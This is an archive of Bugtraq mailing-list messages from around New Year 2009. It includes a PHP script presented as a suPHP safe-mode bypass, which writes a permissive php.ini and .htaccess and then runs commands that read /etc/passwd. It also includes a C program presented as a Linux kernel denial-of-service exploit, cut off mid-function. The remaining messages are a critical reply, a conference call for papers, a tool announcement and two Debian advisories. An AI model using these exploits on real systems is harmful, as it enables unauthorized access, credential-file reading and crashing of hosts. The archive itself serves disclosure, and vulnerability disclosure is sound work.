for <lists@securityspace.com>; Wed, 31 Dec 2008 11:08:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D1645237054; Wed, 31 Dec 2008 08:34:16 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19180 invoked from network); 30 Dec 2008 18:09:58 -0000
Date: 30 Dec 2008 18:31:05 -0000
Message-ID: <20081230183105.16163.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: v8i@hotmail.com
To: bugtraq@securityfocus.com
Subject: apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode
 exploit&#8206;
Status:   

<?
/*
apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit
Author : Mr.SaFa7 
Home : v4-team.com
note : this exploit for education :)
*/


echo "[+] Start...\n";

$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){

echo "[+] evil files created succes ! \n";

}
else{
echo "[-] access denial ! \n";

}
$byprullz1="safe_mode          =       OFF

";

$byprullz2="disable_functions       =            NONE";
$dj=fwrite($bypfile,$byprullz1);

$dj1=fwrite($bypfile,$byprullz2);

fclose($bypfile);
if($dj and $dj1!= NULL){
echo "[+] php.ini writed \n";

}
else{
echo "[-] 404 php.ini not found !\n";
}
$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path 

$sf7=fwrite($stuffile,$breakrullz);

fclose($stuffile);
if($sf7!= NULL){

echo "[+] evil .htaccess writed\n";
echo "[+] exploited by success!\n\n\n";
echo "\t\t\t[+] discouvred by Mr.SaFa7\n";
echo "\t\t\t[+] home : v4-team.com\n";
echo "\t\t\t[+] Greetz : djekmani4ever  ghost hacker  Str0ke ShAfEKo4EvEr Mr.Mn7oS\n";
}
else{

echo "[-] evil .htaccess Not found!\n";
}


system("pwd;ls -lia;uname -a;cat /etc/passwd");

#EOF
?>

From - Wed Dec 31 11:20:39 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000055f8
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39051-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 50E02ED722
for <lists@securityspace.com>; Wed, 31 Dec 2008 11:17:30 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D02C1237015; Wed, 31 Dec 2008 08:34:47 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27551 invoked from network); 31 Dec 2008 02:59:56 -0000
Message-ID: <495AE51D.8020707@ucon-conference.org>
Date: Wed, 31 Dec 2008 00:21:01 -0300
From: uCon Security Conference <cfp@ucon-conference.org>
MIME-Version: 1.0
To: bugtraq@securityfocus.com, pen-test@securityfocus.com
Subject: CFP uCon Security Conference 2009 - Recife, Brazil
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

            CALL FOR PARTICIPATION uCon 2009, 2nd edition
                       Recife, Pernambuco, Brazil


[ - Introduction - ]

   uCon will be a totally informal and non-profit conference taking
place in Recife, Brazil, in 28th of February 2009 -- three days after
the best street carnival ever (also known as the rehearsal of the end of
the world).
The conference aims to bring together academics, hackers and information
security enthusiasts to share cutting-edge ideas and thoughts about
their latest developments and techniques in the field. Attendees will
have the opportunity to network with like-minded people during social
events, such as lunch break and aftercon party and during the capture
the flag competition.


[ - The venue - ]

   The conference will be held at Jardins Bar e Restaurante, one of the
city's most famous clubs. Its infrastructure includes a very comfortable
ballroom with capacity for up to 500 people.


[ - Who? - ]

   The usual gang of cretins, the usual suspects.


[ - Topics - ]

   uCon committee gives preference to lectures with practical
demonstration. The conference staff will try to provide every equipment
needed for the presentation in the case the author cannot provide them.

The following suggested topics include, but are not limited to:

- General system exploitation techniques, vuln-dev and shellcoding
- Web application hacking
- Phone phreaking
- Fuzzing and application security test
- Hardware hacking, embedded systems and other electronic devices
- Mobile devices exploitation, Symbian, P2K and bluetooth technologies
- Analysis of virus, worms and all sorts of malware
- Reverse engineering
- Rootkits
- Security in Wi-Fi and VoIP environments
- Information about smartcard and RFID security and similars
- Technical approach to alternative operating systems
- Denial of service attacks and/or countermeasures
- Techniques for development of secure software and systems
- Security in SCADA and "obscure" environments
- Cryptography
- Information about satellites, GPS and stuff alike
- Lockpicking, trashing and urban exploration
- Internet, privacy and Big Brother
- Information warfare and industrial espionage


[ - Costs - ]

   uCon staff tried to keep an affordable price for attendees and the
early bird entry price is R$ 60. Registration on-site will cost R$ 80.
Lunch, free pass to the aftercon party in Jardins club and access to
the workshops are included within the ticket price.


[ - Deadlines and submissions - ]

   Deadline for proposal submission: 25th of January 2009
   Deadline for acceptation: 5th of February 2009

Send your proposal to cfp@ucon-conference.org and make sure to provide
along with your submission the following details:

- Speaker name or handle
- A short biography of the presenter
- A brief description about your talk
- Estimated time-length of presentation
- Whether you need visa to enter Brazil or not
- Any technical requirements for your lecture

Unlike the past edition, when speakers could choose how many minutes of
presentation time they needed, this time we will have pre-determined
time slots of 45 minutes and a block of 5 minutes lightning talks where
you can just step up the mic and say whatever you want to say.

Preferrable file format for papers and slides are PDF. If you feel old
school enough you can submit them in TXT as well.

Speakers are asked to, but not obligated, hand in slides used in their
lectures.

The lectures will be given in English or Portuguese.

NOTE: Bear in mind if your presentation involves advertisement of
products, services or any kind of sales pitches, please do not submit.


[ - Information for speakers - ]

  Speakers' privileges are:

- Free pass to the conference
- 15 minutes of fame and glory (just to prove Andy Warhol was right)
- Heavy amounts of alcohol, including caipirinha and assorted booze
- Tour to Porto de Galinhas and other paradise beaches in south shore of
Pernambuco
- All the parties money can buy
- We will try our best to cover travelling costs up to USD 750


[ - Other information - ]

   For further information please check out our web site
http://www.ucon-conference.org it will be updated with everything
regarding the conference.

To speak at uCon 2009, send your proposal to cfp@ucon-conference.org

--
Orgazining committee, uCon Security Conference
http://www.ucon-conference.org

From - Thu Jan  1 13:00:39 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005603
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39053-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 52540ED814
for <lists@securityspace.com>; Thu,  1 Jan 2009 12:58:46 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 29B54237481; Thu,  1 Jan 2009 10:43:41 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16448 invoked from network); 1 Jan 2009 15:53:50 -0000
Date: 1 Jan 2009 16:15:17 -0000
Message-ID: <20090101161517.17759.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: i9p@hotmail.fr
To: bugtraq@securityfocus.com
Subject: Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service
 exploit
Status:   

/*
Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit

Author : Adurit Team
         >> djekmani4ever

Home : www.hightsec.com

greetz : adurit team - v4-team - Zigma - stack - Mr.safa7 - king sabri - alphanix - and all my friends

note : this code for education :)
*/

#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <assert.h>
#include <err.h>
#include <stdlib.h>

static int own_child(int *us)
{
        int pid;
        int s[2];
        struct msghdr mh;
        char crap[1024];
        struct iovec iov;
        struct cmsghdr *c;
        int *fd;
        int rc;

        pid = fork();
        if (pid == -1)
                err(1, "fork()");

        if (pid) {
              close(us[1]);

                return pid;
        }

        close(us[0]);

        memset(&mh, 0, sizeof(mh));
        iov.iov_base = "a";
        iov.iov_len  = 1;

        mh.msg_iov        = &iov;
        mh.msg_iovlen     = 1;
        mh.msg_control    = crap;
        mh.msg_controllen = sizeof(crap);

        c = CMSG_FIRSTHDR(&mh);
        assert(c);

        c->cmsg_level = SOL_SOCKET;
        c->cmsg_type  = SCM_RIGHTS;

        fd = (int*) CMSG_DATA(c);
        assert(fd);

        c->cmsg_len = CMSG_LEN(sizeof(int));
        mh.msg_controllen = c->cmsg_len;

        while (1) {
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == -1)
                        err(1, "socketpair()");

                *fd = s[0];

                rc = sendmsg(us[1], &mh, 0);
                if (rc == -1)
                        err(1, "sendmsg()");

                if (rc != iov.iov_len)
                        errx(1, "sent short");

                close(s[0]);
                close(us[1]);
                us[1] = s[1];
        }
}

static void own(void)
{       
        static int pid;
        static int us[2];
        char crap[1024];
        char morte[1024];
        struct cmsghdr *c;
        int rc;
        struct msghdr mh;
        struct iovec iov;
        int *fds;

        if (!pid) {
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == -1)
                        err(1, "socketpair()");
                pid = own_child(us);
        }

        iov.iov_base = morte;
        iov.iov_len  = sizeof(morte);

        memset(&mh, 0, sizeof(mh));
        mh.msg_iov        = &iov;
        mh.msg_iovlen     = 1;
        mh.msg_control    = crap;
        mh.msg_controllen = sizeof(crap);

        rc = recvmsg(us[0], &mh, 0);
        if (rc == -1)
                err(1, "recvmsg()");

        if (rc == 0)
                errx(1, "EOF");

        c = CMSG_FIRSTHDR(&mh);
        assert(c);
        assert(c->cmsg_type == SCM_RIGHTS);

        fds = (int*) CMSG_DATA(c);
        assert(fds);

        close(us[0]);
        us[0] = *fds;
}

int main(int argc, char *argv[])
{
own();
exit(0);

From - Thu Jan  1 13:50:39 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005604
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39052-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id D4414ED814
for <lists@securityspace.com>; Thu,  1 Jan 2009 13:49:19 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1F47F1436FD; Thu,  1 Jan 2009 10:54:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29335 invoked from network); 31 Dec 2008 22:17:30 -0000
Date: 31 Dec 2008 22:38:50 -0000
Message-ID: <20081231223850.28683.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: ms5ote@hotmail.fr
To: bugtraq@securityfocus.com
Subject: Re: apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode
 exploit&#8206;
Status:   

Hi brother For your exploit i dont know why you call it bypass  because suPHP his job is allow users to change some options on PHP by uploading php.ini and for apache with .htacess 


So when SuPHP loaded on Apache modules any user can turn safe_mode off ;
So we can Called "suPHP Script"
and for your exploit it require fopen be eable on php fonction and we always learn from our errors 

and new Happy year for all worlds (alsow muslims)
>From suphp.org
suPHP is a tool for executing PHP scripts with the permissions of their owners. It consists of an Apache module (mod_suphp) and a setuid root binary (suphp) that is called by the Apache module to change the uid of the process executing the PHP interpreter.




For mor detail check :
www.php.net
www.suphp.org

From - Fri Jan  2 12:20:40 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005623
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39054-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 247BBED74A
for <lists@securityspace.com>; Fri,  2 Jan 2009 12:17:27 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id E76B814373A; Fri,  2 Jan 2009 09:19:01 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31430 invoked from network); 1 Jan 2009 22:57:26 -0000
MIME-Version: 1.0
Content-class: 
Message-ID: <2c4f01c96c67$4fbe954a$24a052c6@cc.w2k.vt.edu>
From: "Memisyazici, Aras" <arasm@vt.edu>
Subject: A tool to identify the MD5 certs on FF
thread-topic: A tool to identify the MD5 certs on FF
thread-index: AclsZ0++NQxGzY/5TfSd5LU2VDEiFw=Date: Thu, 1 Jan 2009 18:19:01 -0500
Importance: normal
X-Priority: 3
To: <full-disclosure@lists.grok.org.uk>, <bugtraq@securityfocus.com>
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
charset="iso-8859-1"
X-OriginalArrivalTime: 01 Jan 2009 23:18:54.0083 (UTC) FILETIME=[5043ED30:01C96C67]
Status:   

Exec. Summary : 

<snip from= http://www.codefromthe70s.org/sslblacklist.aspx>

Update 12/31/2008

SSL Blacklist now detects and warns about certificate chains that use the MD5 algorithm for RSA signatures.

</snip>

Great little FF-addon that helps you identify whether the SSL-site you are on is using a bad cert from the Debian/OpenSSL goof a while back, or now whether it is MD5 based.

Enjoy,

Aras Memisyazici
Systems Administrator

Virginia Tech

P.S. Thx Martian for writing such a plugin :D

 
From - Sat Jan  3 13:30:41 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000562d
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39055-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 59B0EED753
for <lists@securityspace.com>; Sat,  3 Jan 2009 13:30:12 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 33C15236F8D; Sat,  3 Jan 2009 11:14:47 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 21205 invoked from network); 2 Jan 2009 18:46:34 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR SBL_XBL_SPAMHAUS=ERR NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client!2.9.189.167> <helo=mail.enyo.de> <from=fw@deneb.enyo.de> <tobian-security-announce@lists.debian.org>, rate: -4.6
From: Florian Weimer <fw@deneb.enyo.de>
Date: Fri, 02 Jan 2009 20:07:44 +0100
Message-ID: <874p0hsf0f.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1694-1] New xterm packages fix remote code execution
Priority: urgent
Resent-Message-ID: <MKmAzAO7T8P.A.S1E.ZYmXJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Fri,  2 Jan 2009 19:08:09 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1694-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
January 02, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : xterm
Vulnerability  : design flaw
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2008-2383
Debian Bug     : 510030

Paul Szabo discovered that xterm, a terminal emulator for the X Window
System, places arbitrary characters into the input buffer when
displaying certain crafted escape sequences (CVE-2008-2383).

As an additional precaution, this security update also disables font
changing, user-defined keys, and X property changes through escape
sequences.

For the stable distribution (etch), this problem has been fixed in
version 222-1etch3.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your xterm package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3.dsc
    Size/MD5 checksum:     1123 3bcc850fe7c9057e5d5d03617cc95195
  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3.diff.gz
    Size/MD5 checksum:    61664 f1e11e4f4c85db1e2ffa67c5d132d2e6
  http://security.debian.org/pool/updates/main/x/xterm/xterm_222.orig.tar.gz
    Size/MD5 checksum:   802986 bb77882a33083632a9c6c9de004a54fb

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_alpha.deb
    Size/MD5 checksum:   437394 2a16b16a6ed79a908987769b9b5a68d8

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_amd64.deb
    Size/MD5 checksum:   416434 46ba9b4430c313464afeaa856d02f09a

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_arm.deb
    Size/MD5 checksum:   412020 9119d878ffedf54c843ec84a98022a3d

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_hppa.deb
    Size/MD5 checksum:   421890 9b3326921fbbd0ba014b3717b20c53fb

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_i386.deb
    Size/MD5 checksum:   403908 f54263828a01af2af86f25c1fedc7aa6

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_ia64.deb
    Size/MD5 checksum:   509374 052861cf2a23d7a414c038d510fc7f01

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_mips.deb
    Size/MD5 checksum:   428858 63615939a4de2f4e3ba0cc61adbf0e47

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_mipsel.deb
    Size/MD5 checksum:   425604 9d18da53eea366eb2688dfe629d95e82

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_powerpc.deb
    Size/MD5 checksum:   409986 824e743d4a6a1abeb5c1fdc0a9e7d006

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_s390.deb
    Size/MD5 checksum:   422196 9b78491ef8fb34da8d5e183e91fc6c65

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/x/xterm/xterm_222-1etch3_sparc.deb
    Size/MD5 checksum:   409994 e284b9163d0da06f932f8e243ccaee2b


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJXmW3AAoJEL97/wQC1SS+B88IALCE/5QT8PKOspzA7s4TVrCx
sZfNri9GsBaQv2fOVRT3QkXGDmKkDmoCxnYT2fsvZ7NoulKdrmoPlNtTNtNxi7y+
sK7j2RVcOkAptxv/OVxwwPMh9KNriwbUnoGgds7vDVLDIAm2DrGqHuKgfyCS8ZxH
RxaVDnqMAKrHLvTliGigu3yiiO08Mqbl95Wi5OI86L8NNAQ5KzkhoQyh8IQzIgm2
kdKEDS/hu7oOCpB6TgHNX+FDVShZpSCVVp2SxIUY0WYdrFhHONv4T9aJCZTh5Lvq
FxKq+zrdd0p4fASVc99p1dL1n8blqXgJVVFYXZIn04r8sbXhQ3Xj3zKezVC39MM=mXuF
-----END PGP SIGNATURE-----

From - Sat Jan  3 13:40:40 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000562e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39056-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id F1E75ED83F
for <lists@securityspace.com>; Sat,  3 Jan 2009 13:40:25 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id E4B7723704E; Sat,  3 Jan 2009 11:15:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26688 invoked from network); 2 Jan 2009 21:26:02 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR SBL_XBL_SPAMHAUS=ERR NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client!2.9.189.167> <helo=mail.enyo.de> <from=fw@deneb.enyo.de> <tobian-security-announce@lists.debian.org>, rate: -4.6
From: Florian Weimer <fw@deneb.enyo.de>
Date: Fri, 02 Jan 2009 22:47:08 +0100
Message-ID: <87tz8hl6sj.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-8.08 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_1=1, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5,
PHONENUMBER=1.5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1695-1] New Ruby packages fix denial of service
Priority: urgent
Resent-Message-ID: <uGvTdAF9OgP.A.MWG.6toXJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Fri,  2 Jan 2009 21:47:38 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1695-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
January 02, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : ruby1.8, ruby1.9
Vulnerability  : memory leak
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2008-3443
Debian Bug     : 494401

The regular expression engine of Ruby, a scripting language, contains a
memory leak which can be triggered remotely under certain circumstances,
leading to a denial of service condition (CVE-2008-3443).

In addition, this security update addresses a regression in the REXML
XML parser of the ruby1.8 package; the regression was introduced in
DSA-1651-1.

For the stable distribution (etch), this problem has been fixed in version
1.8.5-4etch4 of the ruby1.8 package, and version 1.9.0+20060609-1etch4
of the ruby1.9 package.

For the unstable distribution (sid), this problem has been fixed in
version 1.8.7.72-1 of the ruby1.8 package.  The ruby1.9 package will be
fixed soon.

We recommend that you upgrade your Ruby packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz
    Size/MD5 checksum:  4434227 aae9676332fcdd52f66c3d99b289878f
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.dsc
    Size/MD5 checksum:     1102 1c38e939e74513153ee6677ef9f85b0d
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.diff.gz
    Size/MD5 checksum:   176939 2fea21ebd5e29d26714843fa415d6310
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.diff.gz
    Size/MD5 checksum:    32843 859c9ba559722e156d6931f3c8c347a4
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz
    Size/MD5 checksum:  4450198 483d9b46a973c7e14f7586f0b1129891
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.dsc
    Size/MD5 checksum:     1379 cbcf9f41397f2658e1db5ebae0178ccd

Architecture independent packages:

  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch4_all.deb
    Size/MD5 checksum:   265870 fc302abc0465ab56ccd16fc0e724885c
  http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch4_all.deb
    Size/MD5 checksum:   255764 40a840e93b23abfe83f06fb68e411ecc
  http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch4_all.deb
    Size/MD5 checksum:   309788 1a32b37a2ae266825239d31479481202
